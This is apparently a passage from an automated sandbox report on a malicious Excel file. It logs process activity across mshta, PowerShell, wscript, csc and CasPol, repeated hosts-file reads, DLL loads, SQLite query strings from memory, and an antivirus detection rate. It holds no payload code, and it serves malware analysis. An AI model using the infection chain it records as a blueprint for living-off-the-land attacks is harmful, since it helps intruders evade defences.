Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................Yk....}..w............\.......................(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1......)Yk.....bi.....(.P.....................x.......$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................Yk....}..w............\.......................(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............nY......)Yk.....bi.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............nY......)Yk.....bi.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............nY......)Yk.....bi.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............nY......)Yk.....bi.....(.P.............................T.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ...............}..w.............nY......)Yk.....bi.....(.P.....................x...............................

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

System information queried: HandleInformation

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: CasPol.exe, CasPol.exe, 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: A & C Metrology OC 545714677889Materiale.xls

ReversingLabs: Detection: 21%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
